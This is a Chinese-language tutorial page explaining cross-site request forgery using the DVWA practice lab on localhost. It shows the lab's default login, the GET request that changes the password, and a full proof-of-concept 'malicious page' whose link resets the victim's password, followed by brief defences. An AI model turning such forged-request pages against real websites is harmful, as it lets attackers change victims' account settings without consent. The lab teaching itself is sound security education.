溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

簡(jiǎn)述CSRF請(qǐng)求跨站偽造

發(fā)布時(shí)間:2020-10-23 22:50:17 來源:網(wǎng)絡(luò) 閱讀:917 作者:天道酬勤VIP 欄目:安全技術(shù)

首先什么是CSRF:


簡(jiǎn)述CSRF請(qǐng)求跨站偽造


如圖:

    1,用戶通過瀏覽器正常訪問帶有CSRF漏洞的網(wǎng)站。


        如我去訪問http://127.0.0.1:8080/DVWA/login.php

        簡(jiǎn)述CSRF請(qǐng)求跨站偽造


        我們登錄進(jìn)去賬號(hào)是:admin 密碼是:password,找到一個(gè)修改密碼的地方

        簡(jiǎn)述CSRF請(qǐng)求跨站偽造

        修改密碼為123456,修改的url是:

        http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/password_new=123456&password_conf=123456&Change=Change#

        簡(jiǎn)述CSRF請(qǐng)求跨站偽造

        

    2,我們構(gòu)造惡意網(wǎng)站B將代碼保存為index.html

<html>
	<head>
	
	<title>這是惡意網(wǎng)頁</title>
	</head>
	
	<body>
	<h2>這是惡意網(wǎng)頁<h2>
	<a href="http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">***</a> 
	
	</body>

</html>

        我們?cè)L問網(wǎng)站B:點(diǎn)擊***

        簡(jiǎn)述CSRF請(qǐng)求跨站偽造

     

        我們可以看到密碼被改了(改成了password)

        簡(jiǎn)述CSRF請(qǐng)求跨站偽造


防御:

   1.盡量使用POST,限制GET

   2.瀏覽器Cookie策略

   3.Anti CSRF Token



微信公眾號(hào):

簡(jiǎn)述CSRF請(qǐng)求跨站偽造


向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI